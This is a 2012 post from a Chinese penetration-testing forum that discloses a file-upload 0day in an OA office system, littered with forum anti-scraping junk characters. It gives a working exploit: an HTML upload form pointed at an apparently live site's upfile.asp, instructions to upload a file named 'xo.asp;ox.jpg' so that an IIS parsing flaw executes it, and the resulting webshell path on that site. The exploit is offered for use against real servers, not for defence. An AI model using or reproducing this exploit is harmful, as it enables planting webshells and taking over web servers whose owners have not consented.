找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 全能OA办公系统0day OA办公系统漏洞 上传漏洞
返回列表 发新帖
查看: 2830|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
& \# r$ v; y3 w. B
# A- k  M9 ]' O& l3 O% X8 F& j系统介绍:
/ o; M+ |  g4 j3 n4 F# D9 E2 ^" o
% X& T# R+ T% \! p全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
: O! m0 }% W+ I: X
$ c2 f3 Z9 T8 ]' P% }+ g主要功能:
' Z/ {0 Y5 U3 n" u, c! P! Z公司通告 ) y+ {" L, z3 u* L
工作计划
0 B1 k: |9 O& \9 m通讯助理
* a- \( m9 W9 {6 N4 w( l客户资源 % ]1 J- }( ?2 n$ d; A
我的公文
. I3 a, P' c( r; }" }. ^* m公文传阅
; O7 D* x  M2 ?, S公共资源 ! w. L9 X( u: G3 E9 J- q9 N% X' r
资源预约 : r, N9 Z' L# q, r& U8 W
今日考勤
( M; u/ V: d7 }7 {9 ?, j  s个人计划
5 L' t( x3 Y" K0 L, ~  q; T个人通讯录 5 f% f/ K5 j2 K9 r4 t% D% Q, N2 G
个人基本档案 1 ]# t: X7 c: z- {4 T& B$ f+ d, s
未读邮件 - x  i8 X1 N. t1 @8 k( H
发邮件
5 ^& {! Q" `. B! ~' s- Q收件夹
4 {* S* O1 [, @' i寄件夹 / S  O% L/ W, w7 y9 W- w( S
网络硬盘
  [( W6 D6 |  f3 y5 Y网络会议 0 ^8 X) J" O' m5 C
网络调查 6 S- }3 m5 J9 R" L/ t# ^+ p
交流论坛
4 V* T4 y4 j6 t2 {8 ]- T) K$ l; I* X8 w
有兴趣测试的朋友可以下源码看看
. O5 G+ t: a. t; b! F
% }" ^* p4 Z$ }9 A5 N6 O) q源码下载:6 b4 ~5 \5 }- m7 Y, b6 }4 T1 W

2 `4 |* \& D2 f+ w4 p6 whttp://www.mycodes.net/30/4750.htm/ i' O. J- M2 y
$ E  I, }5 B6 M2 N$ W5 T# N- d
漏洞介绍:
6 C. H1 g. H! v6 j% S% X5 F) O. c6 @2 x  `' I
由upfile.asp上传文件漏洞引起) p& F1 r# `. `" V1 y+ v
5 [+ P7 Y; X* e9 O: ~
测试方法:
; j+ `( }, @- c# j7 m
. v- [/ ?6 E% `5 l8 {! k使用名小子上传http://www.itlynn.com/upfile.asp即可- [7 h# [- \0 [
& Y* \. A8 v4 j" |7 V! @# v
如果upfile.asp文件被删除不存在。8 _: b3 f6 N' ~$ Z' E3 T+ w; \
( H' i' _* o' s0 G8 R; j
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp! f' q# z7 n4 \: s- X
5 S+ |9 d( K8 R9 a* P  v: W& L$ \
如果存在那么将如下代码保存为upfile.html。
0 R, {0 W. d3 {: U9 H! ^) S# `( t% v- ]7 e- R
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
4 h& I+ o1 n4 M- \7 s1 c# x
, w  L) s. t6 j$ c/ u9 O( \% t0 J
4 \) o- M4 R7 E, E( K! |2 P5 D5 T' K0 P7 Z" D/ g: f& p
01 <table border='0' align="center" cellpadding="5"> ) q3 g1 V" {$ m8 z
+ _1 x/ u- @) X
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> - ^, i) q; p- ], J
$ k; f- T0 B2 l0 G: q
03 <tr>
: n# I5 W" f; C" ^$ \, C. ?: ?1 d" w# W' v0 k% S
04             <td>报错:</td>
8 @7 e8 ^$ @0 W3 A# u( M6 C* i) x# C9 |0 V$ p) E' k1 Z1 O
05             <td><input type='radio' name='errnumber' value='0'>
' X: ^- H7 n' ], O: n
8 d" A, a" U* h& b; \06               自动更名
2 K9 D8 Y. F) k! w
: E8 M# q* f7 c# k07               <input type='radio' name='errnumber' value='1' checked>
$ k  a- Y; Q2 S( P. A. V) ?6 O0 z$ D' b: a9 T
08               报错方式 1 P2 }3 j, g, A$ e6 v

, P' J  Q8 V2 O2 A8 v" E* j  u09               <input type='radio' name='errnumber' value='2'>
( V" e% \; x: g0 v- r+ [; e7 @2 Y7 g) c* K2 A% S
10               直接覆盖</td> * O0 ~; n: ~. D9 w0 O- V% A: |
& n6 S* |% C9 e" u
11           </tr> ; a0 K& S7 f. `2 t
1 B- z4 q8 ]7 R" B7 Y6 V' l
12           <tr>
. w/ r2 H0 K0 I' `
9 w* |. A* v' B13             <td>主题:</td>
/ C# x+ c5 V0 b- W. B1 U9 U8 y& q. D" ^: G- J) z( n1 o' k
14             <td><input type='text' name='filename' size='30'></td> ) I" W/ v# Y" T' t  R* v$ N

( K! G% O% u9 {( E9 V' w8 H! g15           </tr>
3 J  D6 v) `! {" E) T8 a0 [- m) t
16           <tr> . r7 Y' I; a0 M

/ G: p* L- s2 ?+ r, w17             <td>文件:</td>
. F# J2 c4 r! ~8 E3 {' G, j0 O7 W& j. h; X- H& ]+ X
18             <td><input type="file"name="fruit"size="30"></td>   C5 g2 U4 }% G  Q' i# A& U& X: U
: G. ^  @2 j7 J5 m" [3 F
19           </tr>
6 J# r2 N* ]8 I5 j% v- i
4 W% h6 O' t" j& \3 f2 M20           <tr> . `: _/ u) }5 d. D2 u: [- @
. l1 c. ?3 b) t% y* j
21             <td valign='top'>简介:</td>   \+ U5 x* g4 `2 i
, a: l; h8 y# o# S" t! {
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> , g6 _4 n1 P/ {- \) S% A

1 R7 T2 h) e& |; L  X; l3 B3 R$ V23           </tr>
2 l* C' Z1 k3 V
" Y" G8 K5 U+ `: y) Z. k24   ! x. d+ X  q/ l2 B) N
7 d; a" `$ d& w% X. }
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 2 v1 O5 |, \0 y7 h1 C5 [% B. h
. ]: Y4 P0 y6 K& }! o2 G6 N: D
26           </tr>
, w6 O+ {0 ]" `9 z* V5 E2 ^0 t- D, {0 }' J
27         </form> : d1 G5 ?# M2 U. f# x5 V

0 i& r( O( z8 x3 W& }然后打开上传一个文件名为xo.asp;ox.jpg的文件。& k5 p% a1 G0 G+ {/ D6 |6 [

: A- Q1 }( \! K' g/ J. e! F) p
: f% I. t5 r+ {3 ~) i
% E5 a$ K# h2 g1 J/ C/ }3 B: G上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
; f* i, `- F0 N( h
; k0 \- l4 U$ B3 {- G; y此漏洞需要配合解析漏洞利用。6 Z$ ^! k) ^/ F! E/ \8 i9 E2 e

/ o( y5 p) s* F! B* z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表